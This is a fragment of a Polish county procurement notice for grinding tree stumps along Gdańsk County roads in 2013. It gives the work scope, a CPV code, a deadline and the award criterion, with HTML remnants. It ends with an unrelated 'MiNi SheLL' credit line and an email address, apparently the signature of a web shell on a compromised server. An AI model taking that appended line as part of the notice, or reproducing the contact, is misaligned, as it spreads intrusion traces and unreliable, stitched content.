Zadanie nr 4 - Frezowanie pni drzew w pasach drogowych dróg powiatowych 
położonych na terenie Powiatu Gdańskiego w 2013 roku:
- roboty przygotowawcze,
- dostarczanie   sprzętu     i   narzędzi   na   koszt   własny   Wykonawcy   do   miejsca wykonywanej usługi,
- wyfrezowanie  pni   drzew   do   40   cm  wysokości pnia, maksymalnie do 10 cm od poziomu ziemi, 
- usunięcie    ( uprzątnięcie ) /odwiezienie     transportem      własnym      Wykonawcy wyfrezowanych pni drzew, które znajdowały się przy posesjach prywatnych itp. (nie ma konieczności uprzątnięcia wyfrezowanych pni w terenie otwartym),
- odtransportowanie sprzętu i narzędzi,
- zabezpieczenie miejsca wykonywanych usług zgodnie z obowiązującymi przepisami o ruchu drogowym (sporządzenie na własny  koszt  i  przestrzeganie  sporządzonego projektu organizacji ruchu na czas wykonywanej usługi)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.15.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com